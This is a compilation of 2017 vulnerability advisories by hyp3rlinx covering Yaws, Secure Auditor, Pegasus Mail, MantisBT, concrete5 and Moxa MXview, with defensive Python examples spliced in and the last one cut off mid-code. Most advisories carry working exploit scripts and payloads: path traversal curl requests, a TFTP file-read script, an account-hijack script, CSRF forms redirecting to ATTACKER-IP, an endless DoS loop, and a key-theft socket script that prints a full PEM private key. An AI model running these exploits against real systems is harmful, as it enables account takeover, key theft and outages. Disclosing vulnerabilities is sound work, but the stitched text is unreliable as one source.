CVE-2017-10974 Yaws Web Server v1.91 Unauthenticated Remote File Disclosure

2017-07-10 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
yaws.hyber.org



Product:
===
Yaws v1.91 (Yet Another Web Server)

Yaws is a high performance HTTP 1.1 web server particularly well suited for
dynamic-content web applications.
Two separate modes of operation are supported:

Standalone mode, where Yaws runs as a regular web server daemon. This is the
default mode.
Embedded mode, where Yaws runs as an embedded web server in another Erlang
application.



Vulnerability Type:
===
Unauthenticated Remote File Disclosure



CVE Reference:
==
CVE-2017-10974



Security Issue:

Remote attackers who can reach the Yaws web server can read the server's SSL
private key file using directory traversal; the access logs are disclosed as
well, among other files. This version is somewhat old; however, it is still
available for download as of the time of this writing:
http://yaws.hyber.org/download/



Exploit/POC:
=
Steal Yaws Server SSL private key ".pem" file.

curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem


-----BEGIN RSA PRIVATE KEY-----
[private key material removed]
-----END RSA PRIVATE KEY-----



--- OR Read the access logs. ---


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access  

404 Not Found
Not Found
The requested URL /../logs/localhost.8080.access was not found on this server.
Yaws 1.91 Server at localhost:8080
[root@localhost ~]#

Then,


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access

127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

etc...
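As an added example (not code from the advisory or from Yaws), the following Python shows the request-path check that the %5C../ payload above defeats: the path is percent-decoded exactly once, backslashes are folded into slashes before any ".." handling, and the rebuilt path must still lie under the document root. A second function applies the same check to access-log lines so an administrator can find past attempts in logs like the ones above. The document root and the second sample log line are constructed for this example.

```python
import os
import re
from typing import List, Optional
from urllib.parse import unquote

# Hypothetical document root for this example; the request paths tested below
# are the ones from the advisory.
DOCROOT = "/var/yaws/www"


def resolve_request_path(raw_path: str, docroot: str = DOCROOT) -> Optional[str]:
    """Map an HTTP request path onto a file under docroot, or return None if it escapes.

    The advisory's payload is /%5C../ssl/yaws-key.pem: '%5C' decodes to a backslash,
    which a naive normaliser keeps as part of a directory name while a later step
    (or the OS) treats it as a separator. The order here is: decode once, fold
    backslashes into slashes, then reject any '..' segment, then re-check containment.
    """
    path = unquote(raw_path)          # decode exactly once; %255C stays a literal '%5C'
    path = path.replace("\\", "/")    # backslash counts as a separator for this check
    if "\x00" in path:                # a NUL would truncate the name in a C-level open()
        return None
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None
    root = os.path.normpath(docroot)
    candidate = os.path.normpath(os.path.join(root, *segments)) if segments else root
    # Belt and braces: the rebuilt path must still sit inside the document root.
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


# Request line inside a combined-format access log entry, as in the log above.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def find_traversal_attempts(log_lines: List[str], docroot: str = DOCROOT) -> List[str]:
    """Return the request paths in access-log lines that would escape docroot.

    Yaws logs the request line verbatim, so an attempt against
    /%5C../ssl/yaws-key.pem is visible afterwards even when the key was served.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and resolve_request_path(match.group(1), docroot) is None:
            hits.append(match.group(1))
    return hits


# Constructed sample: the first line is taken from the advisory's log, the second
# is a fabricated entry showing what a successful key read would look like.
SAMPLE_LOG = [
    '127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 '
    '"http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"',
    '10.0.0.5 - - [26/Jun/2017:10:01:02 -0400] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 200 1675 "-" "curl/7.47.0"',
]

if __name__ == "__main__":
    for path in ("/icons/yaws_head.gif", "/%5C../ssl/yaws-key.pem", "/%5C../logs/localhost.8080.access"):
        print(f"{path:40s} -> {resolve_request_path(path)}")
    print("traversal attempts in log:", find_traversal_attempts(SAMPLE_LOG))
```

The single decode is deliberate: a double-encoded %255C is left as the literal directory name "%5C.." rather than decoded again, which keeps it under the document root and simply fails to exist.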



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: June 26, 2017
No replies
July 7, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
 


Vendor:

www.secure-bytes.com



Product:
=
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for 
conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.



Vulnerability Type:
===
Directory Traversal



CVE Reference:
==
CVE-2017-9024



Security Issue:

Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure 
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read 
arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini' 
PORT = 69
 
PAYLOAD = "\x00\x01"#TFTP Read 
PAYLOAD += FILE+"\x00"  #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"   #TFTP Type
 
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure




hyp3rlinx


CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
 


Vendor:
=
www.pmail.com



Product:
===
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client 
suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions 
of users since it was released in 1990.



Vulnerability Type:
==
Remote Code Execution




CVE Reference:
==
CVE-2017-9046



Security Issue:

Pegasus Mail has a DLL load flaw that allows arbitrary code execution when the
user clicks an HTML "mailto:" link, if a DLL named "ssgp.dll" exists on the
victim's Desktop. Tested successfully using the Internet Explorer web browser.

e.g.

<a href="mailto:n...@victim.com">Link text</a>

Place "ssgp.dll" on the Desktop, then visit the web page in Internet Explorer and
click the mailto: link: the arbitrary code is executed and Pegasus (pmail) is
then launched.

The user needs to have set up PMAIL with the "mailto:" link option on install.


Exploit:

1) Set Pegasus as the default email client for opening emails, and set up PMAIL
with the "mailto:" link option on install.


2) Compile "ssgp.dll" as a DLL using the 'C' code below.

#include <windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    /* runs as soon as the loader maps the planted DLL into the process */
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

  return TRUE;   /* DllMain must return TRUE on attach or the loader unloads the DLL */
}



3) Place "ssgp.dll" on the Desktop


4) Create an HTML file containing the following in the web server root directory.
<a href="mailto:n...@victim.com">Pegasus Exploit POC</a>


5) Open the web page in the Internet Explorer web browser and click the malicious
mailto: link.


Our code gets executed...



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure




hyp3rlinx


CVE-2017-9046 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec
 


Vendor:

www.mantisbt.org



Product:
=
Mantis Bug Tracker
1.3.10 / v2.3.0


MantisBT is a popular free web-based bug tracking system. It is written in PHP
and works with MySQL, MS SQL, and PostgreSQL databases.



Vulnerability Type:

CSRF Permalink Injection



CVE Reference:
==
CVE-2017-7620



Security Issue:

Remote attackers can inject arbitrary permalinks into the MantisBT web interface
if an authenticated user visits a malicious web page.

The vulnerable code in the "string_api.php" PHP file, under mantis/core/, did not
account for supplied backslashes.
Line: 270

# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}

# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];




Exploit/POC:
=
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>


OR

<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
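Added example, not MantisBT's code: a Python re-creation of the scheme test quoted from string_api.php above, next to a hardened version. Browsers treat a backslash like a forward slash when resolving a link, so the advisory's \/ATTACKER-IP is really the scheme-relative //ATTACKER-IP; the hardened check folds backslashes first and then rejects anything that carries a scheme or names a host. The fallback to index.php mirrors the quoted code; the app_root value and function names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Python re-creation of the regex quoted from string_api.php line 270 (not MantisBT
# code): a URL is taken to be local as long as it carries no "scheme:" prefix.
SCHEME_LIKE = re.compile(r"(?:[^:]*)?:/*")


def weak_is_local(url: str) -> bool:
    """The vulnerable idea: no colon means no scheme, so the link must be ours."""
    return SCHEME_LIKE.search(url) is None


def hardened_is_local(url: str) -> bool:
    """Accept only a site-absolute path on this host.

    '\\/ATTACKER-IP' has no colon and passes the weak test, but a browser resolves
    it as '//ATTACKER-IP', i.e. another host. Folding backslashes before parsing
    makes that visible; anything with a scheme or an authority is then refused.
    """
    if any(ord(c) < 0x20 or c == "\x7f" for c in url):
        return False                    # control characters have no place in a link
    normalised = url.replace("\\", "/")
    if normalised.startswith("//"):     # '//host', '///host', ... all resolve off-site
        return False
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:    # 'http:', 'javascript:', or a host component
        return False
    return normalised.startswith("/")   # require a path rooted on this site


def sanitize_permalink(url: str, app_root: str = "/mantisbt-2.3.0") -> str:
    """Return the link to embed, falling back to index.php the way the quoted code does."""
    if hardened_is_local(url):
        return url
    return app_root + "/index.php"


if __name__ == "__main__":
    for candidate in ("\\/ATTACKER-IP", "/mantisbt-2.3.0/view.php?id=7", "http://ATTACKER-IP/"):
        print(f"{candidate!r:40} weak={weak_is_local(candidate)!s:5} hardened={hardened_is_local(candidate)}")
```

The useful property is that the decision is made on the string a browser would act on, not on the string the regex happened to see.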




Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure




hyp3rlinx


CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset

2017-04-18 Thread hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec
 


Vendor:

www.mantisbt.org



Product:
==
Mantis Bug Tracker
v1.3.0 / 2.3.0

MantisBT is a popular free web-based bug tracking system. It is written in PHP
and works with MySQL, MS SQL, and PostgreSQL databases.


Vulnerability Type:
===
Pre-Auth Remote Password Reset



CVE Reference:
==
CVE-2017-7615



Security Issue:

The Mantis account verification page 'verify.php' allows resetting ANY user's
password.
Remote unauthenticated attackers can send HTTP GET requests to hijack ANY
Mantis account by guessing the ID / username.

Vulnerable code:

In verify.php line 66:

if( $f_confirm_hash != $t_token_confirm_hash ) {
    trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
}

This code attempts to verify a user account and compares hashes for a user
request.
However, by supplying an empty value we easily bypass the security check.

e.g.

http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1&confirm_hash=

This will then allow you to change passwords and hijack ANY MantisBT account.

All versions >= 1.3.0 as well as 2.3.0 are affected; 1.2.x versions are not
affected.
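Added example (not MantisBT's code) of how the confirm-hash comparison at verify.php line 66 should behave. The quoted check only errors on inequality, so it is satisfied when both sides are empty or missing; the version below returns False for every failure mode (no pending token, an empty or non-string value, an expired token, a mismatch), compares in constant time, and discards a token once it has been used. The token store, TTL and function names are assumptions made for the illustration.

```python
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

TOKEN_TTL_SECONDS = 3600

# In-memory stand-in for the user table column that holds the confirm hash:
# user_id -> (token, expiry timestamp). Assumed for the example only.
TokenStore = Dict[int, Tuple[str, float]]


def issue_confirm_hash(store: TokenStore, user_id: int, now: Optional[float] = None) -> str:
    """Create a fresh, unguessable confirm hash for one user and record when it expires."""
    issued = time.time() if now is None else now
    token = secrets.token_hex(32)            # 256 bits from the OS CSPRNG
    store[user_id] = (token, issued + TOKEN_TTL_SECONDS)
    return token


def confirm_hash_is_valid(store: TokenStore, user_id: int, supplied: Optional[str],
                          now: Optional[float] = None) -> bool:
    """Strict replacement for `if( $f_confirm_hash != $t_token_confirm_hash )`.

    Every path that is not "a non-empty supplied value equals a live stored
    value" returns False, so verify.php?id=1&confirm_hash= cannot pass. A
    successful comparison consumes the token so the same link cannot be replayed.
    """
    entry = store.get(user_id)
    if entry is None:                        # no reset pending for this account
        return False
    if not isinstance(supplied, str) or not supplied:
        return False                         # empty or absent value never matches
    stored, expires_at = entry
    current = time.time() if now is None else now
    if current > expires_at:
        del store[user_id]                   # stale token is dropped, not compared
        return False
    matched = hmac.compare_digest(supplied.encode("utf-8"), stored.encode("utf-8"))
    if matched:
        del store[user_id]                   # single use
    return matched


if __name__ == "__main__":
    tokens: TokenStore = {}
    print("empty hash, no token pending:", confirm_hash_is_valid(tokens, 1, ""))
    t = issue_confirm_hash(tokens, 1)
    print("empty hash, token pending:   ", confirm_hash_is_valid(tokens, 1, ""))
    print("correct hash:                ", confirm_hash_is_valid(tokens, 1, t))
    print("same hash again:             ", confirm_hash_is_valid(tokens, 1, t))
```

hmac.compare_digest is used so that the comparison time does not depend on how many leading characters of a guessed hash are correct.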


References:

https://mantisbt.org/bugs/view.php?id=22690#c56509



POC Video URL:
==
https://vimeo.com/213144905



Exploit/POC:
=
import cookielib,urllib,urllib2,time

print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0'
print '1.2.x versions are not affected'
print 'Remote Password Reset 0day Exploit'
print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n'

IP=raw_input("[Mantis Victim IP]>")
realname=raw_input("[Username]")
verify_user_id=raw_input("[User ID]")
passwd=raw_input("[New Password]")

TARGET = 'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'&confirm_hash='

values={}
account_update_token=''
#verify_user_id='1'  #Admin  = 1
#realname='administrator'#Must be known or guessed.


#REQUEST 1, get Mantis account_update_token 
cookies = cookielib.CookieJar()

opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))

res = opener.open(TARGET)

arr=res.readlines()
for s in arr:
    if 'account_update_token' in s:
        break


#print s[61:-38]
ACCT_TOKEN=s[61:-38]

time.sleep(0.3)

#REQUEST 2 Hijack the Admin Account
TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php'
values = {'verify_user_id' : '1',
'account_update_token' : ACCT_TOKEN,
'realname' : realname,
'password' : passwd,
'password_confirm' : passwd}
  
data = urllib.urlencode(values)

opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))

response = opener.open(TARGET, data)
the_page = response.read()
http_headers = response.info()

#print http_headers
print response.getcode()
print 'Account Hijacked!'
time.sleep(2)




Network Access:
===
Remote




Severity:
=
Critical



Disclosure Timeline:
=
Vendor Notification: April 7, 2017
Vendor acknowledged: April 7, 2017
Vendor patch created: April 10, 2017
Vendor Disclosure: April 16, 2017
April 16, 2017  : Public Disclosure




hyp3rlinx


concrete5 v8.1.0 Host Header Injection

2017-04-14 Thread hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.concrete5.org



Product:

concrete5 v8.1.0

concrete5 is an open-source content management system (CMS) for publishing 
content on the World Wide Web and intranets.


Vulnerability Type:
==
Host Header Injection



CVE Reference:
==
CVE-2017-7725



Security Issue:

If a user does not specify a "canonical" URL on installation of concrete5,
unauthenticated remote attackers can write to the
"collectionversionblocksoutputcache" table of the MySQL database by making an
HTTP GET request with a poisoned HOST header.
Some affected concrete5 web pages can then render arbitrary links that point to
a malicious website.

Example MySQL data from the "CollectionVersionBlocksOutputCache" table.

(164, 1, 57, 'Header Site Title', '<a href="http://attacker-ip/concrete5-8.1.0/index.php" id="header-site-title">Elemental</a>', 1649861489


e.g.

c:\> curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" | more

Services :: POC

var CCM_DISPATCHER_FILENAME = "/concrete5-8.1.0/index.php";
var CCM_CID = 162;
var CCM_EDIT_MODE = false;
var CCM_ARRANGE_MODE = false;
var CCM_IMAGE_PATH = "/concrete5-8.1.0/concrete/images";
var CCM_TOOLS_PATH = "/concrete5-8.1.0/index.php/tools/required";
var CCM_APPLICATION_URL = "http://attacker-ip/concrete5-8.1.0";   <=== HERE
var CCM_REL = "/concrete5-8.1.0";




Exploit:
=

curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/team/faq -H "Host: 
attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: 
attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio -H "Host: 
attacker-ip"

Navigate to one of these URLs:

http://VICTIM-IP/concrete5-8.1.0/index.php/services
http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio

Click on the links in the header portion of the web page at one of the above URLs.

Services
Portfolio
Team / Drop down Menu
Blog
Contact

OR 

click on the links in the footer portion of the web page.

FAQ / Help 
Case Studies
Blog
Another Link
View on Google Maps


Result: user gets redirected to attacker-ip.
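Added example, not concrete5's code: how an application should choose the base URL that ends up in generated links and in an output cache. A configured canonical URL always wins; without one, the Host header is honoured only when it parses as a host and appears in an explicit allowlist, so a poisoned value is rejected before it can be written into a cache row like the one shown above. The function names, the victim.example host and the allowlist are assumptions.

```python
import re
from typing import Iterable, Mapping, Optional

# Host header grammar: a hostname or a bracketed IPv6 literal, optionally with a port.
HOST_RE = re.compile(
    r"^(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(:\d{1,5})?$"
)


class UntrustedHost(ValueError):
    """Raised when a request's Host header must not be used to build absolute URLs."""


def select_base_url(request_headers: Mapping[str, str],
                    canonical_url: Optional[str] = None,
                    allowed_hosts: Iterable[str] = (),
                    scheme: str = "http") -> str:
    """Pick the base URL that generated links (and cached page output) may embed.

    The canonical URL is the setting the advisory says the installer leaves unset;
    when it is present nothing from the request is consulted at all. Otherwise the
    Host header is accepted only if it is syntactically a host and is allowlisted.
    """
    if canonical_url:
        return canonical_url.rstrip("/")
    host = request_headers.get("Host", "")
    match = HOST_RE.match(host)
    if not match:
        raise UntrustedHost(f"malformed Host header: {host!r}")
    hostname = match.group(1).lower()
    if hostname not in {h.lower() for h in allowed_hosts}:
        raise UntrustedHost(f"Host {hostname!r} is not an allowed host for this site")
    return f"{scheme}://{host}"


def render_site_title_link(base_url: str, app_path: str = "/concrete5-8.1.0",
                           title: str = "Elemental") -> str:
    """Header link in the shape of the cached row above, built from a vetted base URL."""
    return f'<a href="{base_url}{app_path}/index.php" id="header-site-title">{title}</a>'


if __name__ == "__main__":
    poisoned = {"Host": "attacker-ip"}
    print(render_site_title_link(select_base_url(poisoned, canonical_url="http://victim.example/")))
    try:
        select_base_url(poisoned, allowed_hosts=["victim.example"])
    except UntrustedHost as exc:
        print("rejected:", exc)
```

Because the allowlist is consulted before anything is rendered, the output cache can only ever hold links built from a host the operator chose.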



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
==
Vendor Notification :  April 11, 2017 
Vendor reply: "this is a known issue" : April 12, 2017 
Requested a CVE from mitre. 
CVE assigned : April 12, 2017
April 13, 2017  : Public Disclosure




hyp3rlinx


CVE-2017-7456 Moxa MXview v2.8 Denial Of Service

2017-04-13 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
 


Vendor:

www.moxa.com



Product:
===
MXView v2.8

Download:
http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.

Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, 
anywhere.



Vulnerability Type:
===
Denial Of Service



CVE Reference:
==
CVE-2017-7456



Security Issue:

Remote attackers can DoS the MXview server by sending a large string of junk
characters as the user ID and password login credentials.



Exploit/POC:
=
import urllib,urllib2

print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'

IP=raw_input("[Moxa MXView IP]>")

PAYLOAD="A"*2

url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' :  PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})

while 1:
    req = urllib2.Request(url, data)
    res = urllib2.urlopen(req)
    print res



Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
==
Vendor Notification:  March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure




hyp3rlinx


CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure

2017-04-12 Thread hyp3rlinx
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC
 


Vendor:

www.moxa.com



Product:
===
MXview V2.8

Download:
http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.

Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, 
anywhere.



Vulnerability Type:
=
Remote Private Key Disclosure



CVE Reference:
==
CVE-2017-7455



Security Issue:

MXview stores a copy of its web server's private key under
C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
Remote attackers can easily read this private key file "mxview.key" by making
an HTTP GET request.

e.g.

curl -v   http://VICTIM-IP:81/certs/mxview.key


* About to connect() to VICTIM-IP port 81
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 
> Host: VICTIM-IP:81
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
+CPTV6agBkYxe7Q=
-----END PRIVATE KEY-----



Exploit:
=
import socket

print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'

IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)

print 'Enjoy ur private server key!\n'
print s.recv(512)

s.close()
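Added example, not Moxa's code: a small audit that walks a directory served over HTTP and reports files holding private-key material, the kind of check that would have flagged certs/mxview.key before it was reachable by a GET request. The sample directory layout and the placeholder key body are constructed here.

```python
import os
import re
import tempfile
from typing import List

# PEM private-key headers (PKCS#1, SEC1, DSA, PKCS#8 and encrypted PKCS#8).
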